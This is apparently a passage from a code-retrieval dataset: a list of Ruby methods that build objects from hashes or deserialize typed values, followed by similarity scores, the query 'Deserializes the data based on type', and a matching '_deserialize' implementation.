"def initialize( hash )\n\t\t@object_classes = self.parse_objectclasses( hash['objectClasses'] || [] )\n\t\t@attribute_types = self.parse_attribute_types( hash['attributeTypes'] || [] )\n\t\t@ldap_syntaxes = self.parse_ldap_syntaxes( hash['ldapSyntaxes'] || [] )\n\t\t@matching_rules = self.parse_matching_rules( hash['matchingRules'] || [] )\n\t\t@matching_rule_uses = self.parse_matching_rule_uses( hash['matchingRuleUse'] || [] )\n\tend",
"def from_hash(hash)\n super(hash)\n verify\n end",
"def objects_from_serialized_hash(hash) # :nodoc:\n klass, attributes = Helpers.to_class_and_attributes(hash)\n klass.from_seedable_attributes(attributes)\n end",
"def initialize (hash)\n @name = hash [:name]\n @color = hash [:color]\n @robots = hash [:robots]\n @moon_count = hash [:moon_count]\n @cats = hash [:cats]\n #@solar_rotation = solar_rotation .....I dont really understand what a solar rotation is.... it's confusing.....\n @distance_from_the_sun = hash [:distance_from_the_sun]\n end",
"def initialize(hash = nil)\n @arguments = 0\n return if hash.nil?\n @name = hash['name']\n @arguments = hash['arguments']\n end",
"def _from_hash(hsh)\n hsh.each do |k, v|\n v = restore_hash(v)\n v = v.map { |iv| restore_hash(iv) } if v.is_a?(Array)\n send(:\"#{k}=\", v)\n end\n self\n end",
"def from_hash(hash)\n struct = SparkleStruct.new\n struct._camel_keys_set(:auto_discovery)\n struct._load(hash)\n struct._camel_keys_set(nil)\n struct\n end",
"def from_hash(hash)\n struct = SparkleStruct.new\n struct._camel_keys_set(:auto_discovery)\n struct._load(hash)\n struct._camel_keys_set(nil)\n struct\n end",
"def initialize(hash={})\n self.attributes = hash\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @version, @cost, @salt, @checksum = split_hash(self)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @version, @cost, @salt, @checksum = split_hash(self)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def build(base, object, type = nil, selected_fields = nil)\n return object unless object.is_a?(Hash)\n if _loading?\n Factory.from_db(klass, object, nil, selected_fields)\n else\n Factory.build(klass, object)\n end\n end",
"def initialize(hash)\n super(hash)\n @size = hash[\"size\"]\n end",
"def initialize(raw_hash)\n if valid_hash?(raw_hash)\n self.replace(raw_hash)\n @cost, @salt, @digest = split_hash(self.to_s)\n else\n raise Errors::InvalidHash.new(\"invalid hash\")\n end\n end",
"def instantiate hash, extra_attributes={}\n return hash unless hash.kind_of? Hash\n# init = hash.values_at(*@singulars).compact.first\n init = hash[@singular]\n inits = hash[@plural]\n if init\n new init.merge extra_attributes\n elsif inits\n inits.map {|each| new each.merge extra_attributes}\n else\n hash\n end\n end",
"def from_hash(values)\n @data_object.team_challenge = values['team_challenge']\n @data_object.team_level = values['team_level']\n @data_object.team_name = values['team_name']\n\n# @mgr_email = values['mgr_email']\n\n names = values['tm_name']\n\n TeamMember::MEMBERS_PER_TEAM.times do |i|\n if names[i].empty?\n @members[i].clear\n else\n @members[i].tm_name = names[i]\n @members[i].tm_grade = values['tm_grade'][i].to_i\n @members[i].tm_dob_mon = values['tm_dob_mon'][i]\n @members[i].tm_dob_day = values['tm_dob_day'][i]\n @members[i].tm_dob_year = values['tm_dob_year'][i]\n @members[i].tm_sex = values['tm_sex'][i]\n end\n end\n end",
"def hash\n { hash: @hash, hashType: @hash_type }\n end",
"def initialize(raw_hash)\n raise Errors::InvalidHash, 'invalid hash' unless valid_hash?(raw_hash)\n\n replace(raw_hash)\n\n @cost, @salt, @digest = split_hash(to_s)\n end",
"def initialize( confighash={} )\n\t\tihash = internify_keys( untaint_values(confighash) )\n\t\tmergedhash = DEFAULTS.merge( ihash, &HashMergeFunction )\n\n\t\t@struct = ConfigStruct.new( mergedhash )\n\t\t@create_time = Time.now\n\t\t@name = nil\n\t\t@loader = nil\n\n\t\tsuper()\n\tend",
"def initialize(*args)\n @hash = HashWithIndifferentAccess.new(*args)\n end",
"def create(hash={})\n model = self.new(hash)\n model.save\n model\n end",
"def from_hash(hash:, klass:)\n validate_class_kit(klass)\n\n @hash_helper.indifferent!(hash)\n entity = klass.new\n attributes = @attribute_helper.get_attributes(klass)\n attributes.each do |attribute|\n key = attribute[:name]\n type = attribute[:type]\n\n #if the hash value is nil skip it\n next if hash[key].nil?\n\n value = if is_class_kit?(type)\n from_hash(hash: hash[key], klass: type)\n elsif type == Array\n hash[key].map do |array_element|\n if attribute[:collection_type].nil?\n array_element\n else\n if is_class_kit?(attribute[:collection_type])\n from_hash(hash: array_element, klass: attribute[:collection_type])\n else\n @value_helper.parse(type: attribute[:collection_type], value: array_element)\n end\n end\n end\n else\n hash[key]\n end\n\n entity.public_send(:\"#{key}=\", value)\n end\n\n entity\n end",
"def from_h(hash, converter = nil)\n instance = new\n\n hash.each do |k, v|\n v = convert(v, k, converter) if converter\n instance.instance_variable_set(:\"@#{k}\", v)\n end\n\n instance\n end",
"def initialize(hash_that_represents_json)\n\t\t@data = hash_that_represents_json\n\tend",
"def hash_for_merging(hash)\n new_hash = { id: hash['message_id'].to_i,\n date: Time.at(hash['date'].to_i),\n from: User.new(hash['from'], @bot),\n chat: Chat.new(hash['chat'], @bot) }\n\n type = TYPES.find { |t| hash[t.to_s] }\n new_hash[type] = hash[type.to_s] # TODO: fail if type not found\n\n new_hash\n end",
"def initialize(hash)\n @header = Msg::Header.new(hash)\n @body = Msg::Body.new(content_is_json?, hash)\n end",
"def build_resource(hash = {})\n self.resource = resource_class.new(hash)\n end",
"def initialize()\n @hash = {}\n @values = []\n end",
"def build\n fail \"Please provide a value for key, currently: #{key}\" if key.nil?\n\n if in_key\n { in_key.to_sym => { key => data } }\n else\n process_data\n transform_to_hash\n end\n end",
"def initialize(build)\n @build = build\n @hash = {}\n @already_run = []\n end",
"def new_from_hash_marketplace(h)\n self.url = h\n h=h.split('/')\n h=h[h.size-2]\n self.original_id = h\n return self\n end",
"def initialize(hash, type, dump)\n self.hash = hash\n self.type = type.to_sym\n self.dump = dump\n end",
"def initialize(hash_data, opts: {})\n @hsh = hash_data\n @opts = opts\n\n @title = @hsh[:title]\n @body = @hsh[:body_hash]\n end",
"def initialize(hash)\n @color = hash[:color]\n @scent = hash[:scent]\n end",
"def initialize(hash = nil)\n hash.each { |key, value| self[key] = value } if !hash.nil? && hash.is_a?(Hash)\n end",
"def create(hash)\n NotImplementedError\n end",
"def from_h(hash, converter = nil)\n instance = new\n\n hash.each do |k, v|\n v = instance.convert(v, k, converter) if converter\n instance.send(:\"#{k}=\", v)\n end\n\n instance\n end",
"def init_jaxb_json_hash(_o)\n super _o\n @id = String.from_json(_o['id']) unless _o['id'].nil?\n @version = String.from_json(_o['version']) unless _o['version'].nil?\n @description = String.from_json(_o['description']) unless _o['description'].nil?\n @url = String.from_json(_o['url']) unless _o['url'].nil?\n @name = String.from_json(_o['name']) unless _o['name'].nil?\n @organization = Org::Apache::Archiva::Metadata::Model::Organization.from_json(_o['organization']) unless _o['organization'].nil?\n @issueManagement = Org::Apache::Archiva::Metadata::Model::IssueManagement.from_json(_o['issueManagement']) unless _o['issueManagement'].nil?\n @scm = Org::Apache::Archiva::Metadata::Model::Scm.from_json(_o['scm']) unless _o['scm'].nil?\n @ciManagement = Org::Apache::Archiva::Metadata::Model::CiManagement.from_json(_o['ciManagement']) unless _o['ciManagement'].nil?\n if !_o['licenses'].nil?\n @licenses = Array.new\n _oa = _o['licenses']\n _oa.each { | _item | @licenses.push Org::Apache::Archiva::Metadata::Model::License.from_json(_item) }\n end\n if !_o['mailingLists'].nil?\n @mailingLists = Array.new\n _oa = _o['mailingLists']\n _oa.each { | _item | @mailingLists.push Org::Apache::Archiva::Metadata::Model::MailingList.from_json(_item) }\n end\n if !_o['dependencies'].nil?\n @dependencies = Array.new\n _oa = _o['dependencies']\n _oa.each { | _item | @dependencies.push Org::Apache::Archiva::Metadata::Model::Dependency.from_json(_item) }\n end\n @incomplete = Boolean.from_json(_o['incomplete']) unless _o['incomplete'].nil?\n end",
"def create_version_hash\n new_version = {}\n new_version['created'] = ''\n new_version['message'] = ''\n new_version['user'] = {}\n # user is #name, # address.\n new_version['user']['name'] = ''\n new_version['user']['address'] = ''\n new_version['state'] = {}\n new_version\n end",
"def create_from_hash hash\n values = values_from_hash hash\n unless obj = find(:first, :conditions => values)\n return nil if values[:id]\n obj = create!(values)\n raise ArgumentError, \"#{obj.errors.to_s}\" unless obj.errors.empty?\n end\n obj\n end",
"def initialize result_hash={}\n @result_hash = result_hash\n end",
"def create_hash(&block); end",
"def create_hash(&block); end",
"def initialize(attrs={})\n from_hash(attrs)\n end",
"def build_request_data(hash)\n {\n :attributes! => {\n addressinfo: { \"xsi:type\" => \"ns2:Map\" },\n },\n username: @username,\n password: @password,\n addressinfo: {\n item: [\n { key: 'name', value: hash[:name] },\n { key: 'address1', value: hash[:address1] },\n { key: 'address2', value: hash[:address2] },\n { key: 'city', value: hash[:city] },\n { key: 'state', value: hash[:state] },\n { key: 'zip', value: hash[:zip] },\n { key: 'fflno', value: hash[:fflno] },\n { key: 'fflexp', value: hash[:fflexp] }\n ]\n },\n testing: @testing\n }\n end",
"def init_jaxb_json_hash(_o)\n @groupId = String.from_json(_o['groupId']) unless _o['groupId'].nil?\n @artifactId = String.from_json(_o['artifactId']) unless _o['artifactId'].nil?\n @version = String.from_json(_o['version']) unless _o['version'].nil?\n @packaging = String.from_json(_o['packaging']) unless _o['packaging'].nil?\n @className = String.from_json(_o['className']) unless _o['className'].nil?\n if !_o['repositories'].nil?\n @repositories = Array.new\n _oa = _o['repositories']\n _oa.each { | _item | @repositories.push String.from_json(_item) }\n end\n @bundleVersion = String.from_json(_o['bundleVersion']) unless _o['bundleVersion'].nil?\n @bundleSymbolicName = String.from_json(_o['bundleSymbolicName']) unless _o['bundleSymbolicName'].nil?\n @bundleExportPackage = String.from_json(_o['bundleExportPackage']) unless _o['bundleExportPackage'].nil?\n @bundleExportService = String.from_json(_o['bundleExportService']) unless _o['bundleExportService'].nil?\n @classifier = String.from_json(_o['classifier']) unless _o['classifier'].nil?\n @includePomArtifacts = Boolean.from_json(_o['includePomArtifacts']) unless _o['includePomArtifacts'].nil?\n @queryTerms = String.from_json(_o['queryTerms']) unless _o['queryTerms'].nil?\n @bundleImportPackage = String.from_json(_o['bundleImportPackage']) unless _o['bundleImportPackage'].nil?\n @bundleRequireBundle = String.from_json(_o['bundleRequireBundle']) unless _o['bundleRequireBundle'].nil?\n @pageSize = Fixnum.from_json(_o['pageSize']) unless _o['pageSize'].nil?\n @selectedPage = Fixnum.from_json(_o['selectedPage']) unless _o['selectedPage'].nil?\n end",
"def initialize(order_hash)\n @id = order_hash['id']\n @number = order_hash['number']\n @special_instructions = order_hash['special_instructions']\n @total = order_hash['total']\n @total_quantity = order_hash['total_quantity']\n @created_at = order_hash['created_at']\n @updated_at = order_hash['updated_at']\n end",
"def from_db_hash *args\n from_hash *args\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end",
"def build_from_hash(attributes)\n return nil unless attributes.is_a?(Hash)\n self.class.swagger_types.each_pair do |key, type|\n if type =~ /^Array<(.*)>/i\n if attributes[self.class.attribute_map[key]].is_a?(Array)\n self.send(\"#{key}=\", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )\n else\n #TODO show warning in debug mode\n end\n elsif !attributes[self.class.attribute_map[key]].nil?\n self.send(\"#{key}=\", _deserialize(type, attributes[self.class.attribute_map[key]]))\n else\n # data not found in attributes(hash), not an issue as the data can be optional\n end\n end\n\n self\n end"
] |
[
"0.8011074",
"0.7470833",
"0.7457607",
"0.7256629",
"0.72455454",
"0.70060325",
"0.6973257",
"0.6955014",
"0.69459796",
"0.69398683",
"0.69363195",
"0.6917627",
"0.6872358",
"0.6796184",
"0.6783521",
"0.67575246",
"0.67575246",
"0.67560464",
"0.67514306",
"0.67136854",
"0.66667664",
"0.6623634",
"0.661206",
"0.66098964",
"0.66098964",
"0.6591922",
"0.65713006",
"0.6547411",
"0.6524743",
"0.6524143",
"0.6513636",
"0.650189",
"0.6498057",
"0.6485853",
"0.6483371",
"0.6475685",
"0.6459916",
"0.6454491",
"0.6440182",
"0.6434778",
"0.6401363",
"0.63977015",
"0.6396885",
"0.63910425",
"0.63720834",
"0.6363958",
"0.63597506",
"0.6313429",
"0.6295958",
"0.62923384",
"0.62915224",
"0.62704456",
"0.62703115",
"0.62622243",
"0.62515473",
"0.6249854",
"0.6242987",
"0.6242987",
"0.62426233",
"0.62408733",
"0.62407595",
"0.62321323",
"0.62298346",
"0.622897",
"0.622756",
"0.62245685",
"0.62217826",
"0.6218501",
"0.6210329",
"0.62091905",
"0.620342",
"0.6201614",
"0.6178616",
"0.6166234",
"0.61611027",
"0.6140086",
"0.6126761",
"0.61154264",
"0.61059844",
"0.60980254",
"0.60971874",
"0.6090533",
"0.6064119",
"0.6061236",
"0.6060324",
"0.60599816",
"0.60420287",
"0.6039776",
"0.603712",
"0.6033585",
"0.6030829",
"0.6023582",
"0.6023582",
"0.6016123",
"0.60155296",
"0.6014705",
"0.6008574",
"0.60031897",
"0.60024095",
"0.60024095",
"0.60024095"
] |
0.0
|
-1
|
Deserializes the data based on type
|
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = Marketcheck_api_sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
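A small dispatch sketch (receiver elided; in the generated model these are instance-level calls) showing how the type string routes scalars, arrays, and hashes through the same case statement:

_deserialize('Integer', '42')                         # => 42
_deserialize('BOOLEAN', 'yes')                        # => true
_deserialize('Array<Float>', ['1.5', '2.5'])          # => [1.5, 2.5]
_deserialize('Hash<String, Integer>', { 'a' => '1' }) # => { 'a' => 1 }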
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Telstra_Messaging.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = FattureInCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = IFClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = WineShipping.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
